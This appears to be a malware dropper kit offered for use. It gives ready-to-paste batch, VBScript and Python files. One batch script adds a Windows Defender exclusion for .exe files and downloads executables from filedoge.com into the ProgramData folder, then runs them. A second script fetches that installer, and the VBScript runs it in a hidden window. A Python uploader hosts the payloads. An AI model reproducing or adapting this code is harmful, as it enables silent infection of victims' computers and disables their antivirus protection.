#██████╗░ ██████╗░ ███████╗ ██╗░░░░░ ██╗ ██╗░░██╗ ███████╗ ░██████╗ ██╗░░░░░ ██╗ ███╗░░██╗ ██╗░░░██╗ ██╗░░██╗
#██╔══██╗ ██╔══██╗ ██╔════╝ ██║░░░░░ ██║ ██║░██╔╝ ██╔════╝ ██╔════╝ ██║░░░░░ ██║ ████╗░██║ ██║░░░██║ ╚██╗██╔╝
#██║░░██║ ██████╔╝ █████╗░░ ██║░░░░░ ██║ █████═╝░ █████╗░░ ╚█████╗░ ██║░░░░░ ██║ ██╔██╗██║ ██║░░░██║ ░╚███╔╝░
#██║░░██║ ██╔══██╗ ██╔══╝░░ ██║░░░░░ ██║ ██╔═██╗░ ██╔══╝░░ ░╚═══██╗ ██║░░░░░ ██║ ██║╚████║ ██║░░░██║ ░██╔██╗░
#██████╔╝ ██║░░██║ ███████╗ ███████╗ ██║ ██║░╚██╗ ███████╗ ██████╔╝ ███████╗ ██║ ██║░╚███║ ╚██████╔╝ ██╔╝╚██╗
#╚═════╝░ ╚═╝░░╚═╝ ╚══════╝ ╚══════╝ ╚═╝ ╚═╝░░╚═╝ ╚══════╝ ╚═════╝░ ╚══════╝ ╚═╝ ╚═╝░░╚══╝ ░╚═════╝░ ╚═╝░░╚═╝

# This contains the vbs file, the batch files and py file you will need. Also for this you will need to upload your files to https://filedoge.com/ . 
# ALSO ONLY COPY CODE FROM IN BETWEEN THE ''  '' !!!!!!!!!  <---------------------------------------------------------------------------------------

# Paste this for your "installer.bat" file.
''
@echo off
cd %programdata%
Powershell -Command "Set-MpPreference -ExclusionExtension exe"
Powershell -Command "Invoke-Webrequest 'https://api.filedoge.com/YOUR DIRECT DOWNLOAD LINK' -OutFile 'YOUR FILE NAME.exe'"
.\YOUR FILE NAME.exe
Powershell -Command "Invoke-Webrequest 'https://api.filedoge.com/YOUR DIRECT DOWNLOAD LINK' -OutFile 'YOUR FILE NAME.exe'"
.\YOUR FILE NAME.exe
''

# Paste this for your "main.bat" file.
''
@echo off
cd %programdata%
curl "https://api.filedoge.com/LINK TO installer.bat YOU CREATED" -o installer.bat
curl "https://api.filedoge.com/LINK TO run.vbs YOU CREATED" -o run.vbs
run.vbs
''

# Paste this for your "run.vbs" file.
''
Set objShell = CreateObject("WScript.Shell")

objShell.Run "cmd /c installer.bat", 0, True

objShell.Run "cmd /c exit", 0, False
''

# Paste this for your "uploader.py" file.
''
import os
import subprocess
import json
def upload_file(file_path):
    curl_command = f'curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@{file_path}"'

    try:
        result = subprocess.run(curl_command, shell=True, check=True, capture_output=True, text=True)
        upload_response = json.loads(result.stdout.strip())
        return upload_response

    except subprocess.CalledProcessError as e:
        return {"error": f"Upload failed: {e}"}
    except Exception as e:
        return {"error": f"Upload failed: {str(e)}"}
def main():
    file_path = input("Enter the file path you want to upload: ").strip().replace('"', '')

    if not os.path.isfile(file_path):
        print("Invalid file path. Please try again.")
        return
    upload_response = upload_file(file_path)
    if "error" in upload_response:
        print(f"Error: {upload_response['error']}")
        return
    file_token = upload_response['token']
    file_name = upload_response['originalFilename']
    file_size = upload_response['size']
    download_url = f"https://api.filedoge.com/download/{file_token}"
    print(f"Your Direct Download URL: {download_url}")
    print(f"Your Original File Name: {file_name}")
    print(f"Your File Size: {file_size} bytes")
    input("Press Enter to exit...")
if __name__ == "__main__":
    main()
''

# Keep these files inside of your desktop.
# https://filedoge.com/ goes down very frequently so if you are trying to upload a file and it says that the site is not online its because the server is down. Just be patient.
